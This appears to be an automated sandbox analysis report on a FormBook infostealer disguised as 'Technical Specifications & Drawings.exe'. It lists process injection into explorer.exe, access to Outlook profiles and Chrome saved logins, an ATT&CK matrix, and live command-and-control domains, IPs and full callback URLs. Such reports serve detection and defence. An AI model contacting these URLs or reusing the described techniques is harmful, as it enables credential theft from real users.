          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 4.0.Technical Specifications & Drawings.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Technical Specifications & Drawings.exe.39fd758.9.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000013.00000002.508193652.00000000024C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.314845901.000000000B546000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.513252120.0000000004260000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.510569655.0000000002A30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.260249710.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.333361957.000000000B546000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.265706280.00000000039FD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Tries to steal Mail credentials (via file / registry access)
          Source: C:\Windows\SysWOW64\control.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
          Tries to harvest and steal browser information (history, passwords, etc)
          Source: C:\Windows\SysWOW64\control.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

          Remote Access Functionality

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 4.0.Technical Specifications & Drawings.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Technical Specifications & Drawings.exe.39fd758.9.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000013.00000002.508193652.00000000024C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.314845901.000000000B546000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.513252120.0000000004260000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.510569655.0000000002A30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.260249710.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.333361957.000000000B546000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.265706280.00000000039FD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts1
          Shared Modules          		Path Interception612
          Process Injection          		1
          Masquerading          		1
          OS Credential Dumping          		121
          Security Software Discovery          		Remote Services1
          Email Collection          		Exfiltration Over Other Network Medium1
          Encrypted Channel          		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
          Disable or Modify Tools          		LSASS Memory2
          Process Discovery          		Remote Desktop Protocol11
          Archive Collected Data          		Exfiltration Over Bluetooth3
          Ingress Tool Transfer          		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)31
          Virtualization/Sandbox Evasion          		Security Account Manager31
          Virtualization/Sandbox Evasion          		SMB/Windows Admin Shares1
          Data from Local System          		Automated Exfiltration4
          Non-Application Layer Protocol          		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)612
          Process Injection          		NTDS1
          Remote System Discovery          		Distributed Component Object ModelInput CaptureScheduled Transfer114
          Application Layer Protocol          		SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script11
          Deobfuscate/Decode Files or Information          		LSA Secrets13
          System Information Discovery          		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.common3
          Obfuscated Files or Information          		Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup Items13
          Software Packing          		DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
          File Deletion          		Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 680337 Sample: Technical Specifications & ... Startdate: 08/08/2022 Architecture: WINDOWS Score: 100 31 www.fundycases.com 2->31 33 td-balancer-199-15-163-148.wixdns.net 2->33 35 3 other IPs or domains 2->35 39 Snort IDS alert for network traffic 2->39 41 Multi AV Scanner detection for domain / URL 2->41 43 Malicious sample detected (through community Yara rule) 2->43 45 8 other signatures 2->45 9 Technical Specifications & Drawings.exe 3 2->9         started        signatures3 process4 file5 23 Technical Specific... & Drawings.exe.log, ASCII 9->23 dropped 55 Injects a PE file into a foreign processes 9->55 13 Technical Specifications & Drawings.exe 9->13         started        signatures6 process7 signatures8 57 Modifies the context of a thread in another process (thread injection) 13->57 59 Maps a DLL or memory area into another process 13->59 61 Sample uses process hollowing technique 13->61 63 Queues an APC in another process (thread injection) 13->63 16 explorer.exe 13->16 injected process9 dnsIp10 25 www.esandcraic.com 67.223.117.72, 49809, 80 VIMRO-AS15189US United States 16->25 27 tomoptique.fr 109.234.162.62, 49780, 80 O2SWITCHFR France 16->27 29 8 other IPs or domains 16->29 37 System process connects to network (likely due to code injection or exploit) 16->37 20 control.exe 13 16->20         started        signatures11 process12 signatures13 47 Tries to steal Mail credentials (via file / registry access) 20->47 49 Tries to harvest and steal browser information (history, passwords, etc) 20->49 51 Deletes itself after installation 20->51 53 2 other signatures 20->53

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          Technical Specifications & Drawings.exe32%VirustotalBrowse
          Technical Specifications & Drawings.exe22%ReversingLabsByteCode-MSIL.Spyware.Noon
          Technical Specifications & Drawings.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          4.0.Technical Specifications & Drawings.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          boshi-eg.online12%VirustotalBrowse
          mexc-event-partner.site6%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.kirchhoff-darryl.com/02pi/?ZL0=JO9pwDAFX0pE08ZhB6JsQfIKbq32cMNHUs94bAK91+KgqpPGSJqKC7J3zS0r1gze3M+2qFZl2NsX2aSbasAE+ZE0SL8u6zgnew==&wRtdp=ETVPg0_100%Avira URL Cloudmalware
          http://www.tomoptique.fr/02pi/?ZL0=thvfohwi7xD8LUPTC+PvURbDlMdrWv6G+kdQz5W5EjaeNcjaAM/7YzWabXa+Emqnmxa+j2rvyn8aQKdomTvD7NHn7LH6m5q/aw==&wRtdp=ETVPg0_100%Avira URL Cloudmalware
          http://www.mexc-event-partner.site/02pi/?ZL0=OtaEbXX4ObCoLhtF/lWLZX2dLDLBfFgcjwhWC5AcKk5LEysMwPLPLl+t4RfX0ATi8hGNnWUlfKNR4DoGgewcnJOxYMoo89i/Ow==&wRtdp=ETVPg0_100%Avira URL Cloudmalware
          http://www.tiro.com0%URL Reputationsafe
          http://www.esandcraic.com/02pi/?ZL0=H3j/zDn1cik0H8aEc4JTyOZmy0u09IlpCgxUGgbrjIcqKZuTm1TQkyEN0mTnJzpMGdd8V9PF4iBs4MdYqflf8PDJEP40yO/f8Q==&wRtdp=ETVPg0_100%Avira URL Cloudmalware
          http://www.kirchhoff-darryl.com/02pi?ZL0=JO9pwDAFX0pE08ZhB6JsQfIKbq32cMNHUs94bAK91100%Avira URL Cloudmalware
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.mexc-event-partner.site/02pi/100%Avira URL Cloudmalware
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          www.tomoptique.fr/02pi/100%Avira URL Cloudmalware
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          boshi-eg.online
          		67.23.226.119
          		truetrueunknown
          tomoptique.fr
          		109.234.162.62
          		truetrue
            		unknown
            mexc-event-partner.site
            		184.168.107.80
            		truetrueunknown
            www.kirchhoff-darryl.com
            		107.155.208.43
            		truetrue
              		unknown
              www.esandcraic.com
              		67.223.117.72
              		truetrue
                		unknown
                td-balancer-199-15-163-148.wixdns.net
                		199.15.163.148
                		truefalse
                  		unknown
                  www.mexc-event-partner.site
                  		unknown
                  		unknowntrue
                    		unknown
                    www.fundycases.com
                    		unknown
                    		unknowntrue
                      		unknown
                      www.gzkanglongkeji.com
                      		unknown
                      		unknowntrue
                        		unknown
                        www.boshi-eg.online
                        		unknown
                        		unknowntrue
                          		unknown
                          www.tomoptique.fr
                          		unknown
                          		unknowntrue
                            		unknown

                            Contacted URLs

                            NameMaliciousAntivirus DetectionReputation
                            http://www.kirchhoff-darryl.com/02pi/?ZL0=JO9pwDAFX0pE08ZhB6JsQfIKbq32cMNHUs94bAK91+KgqpPGSJqKC7J3zS0r1gze3M+2qFZl2NsX2aSbasAE+ZE0SL8u6zgnew==&wRtdp=ETVPg0_true
                            • Avira URL Cloud: malware
                            		unknown
                            http://www.tomoptique.fr/02pi/?ZL0=thvfohwi7xD8LUPTC+PvURbDlMdrWv6G+kdQz5W5EjaeNcjaAM/7YzWabXa+Emqnmxa+j2rvyn8aQKdomTvD7NHn7LH6m5q/aw==&wRtdp=ETVPg0_true
                            • Avira URL Cloud: malware
                            		unknown
                            http://www.mexc-event-partner.site/02pi/?ZL0=OtaEbXX4ObCoLhtF/lWLZX2dLDLBfFgcjwhWC5AcKk5LEysMwPLPLl+t4RfX0ATi8hGNnWUlfKNR4DoGgewcnJOxYMoo89i/Ow==&wRtdp=ETVPg0_true
                            • Avira URL Cloud: malware
                            		unknown
                            http://www.esandcraic.com/02pi/?ZL0=H3j/zDn1cik0H8aEc4JTyOZmy0u09IlpCgxUGgbrjIcqKZuTm1TQkyEN0mTnJzpMGdd8V9PF4iBs4MdYqflf8PDJEP40yO/f8Q==&wRtdp=ETVPg0_true
                            • Avira URL Cloud: malware
                            		unknown
                            http://www.mexc-event-partner.site/02pi/true
                            • Avira URL Cloud: malware
                            		unknown
                            www.tomoptique.fr/02pi/true
                            • Avira URL Cloud: malware
                            		low

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
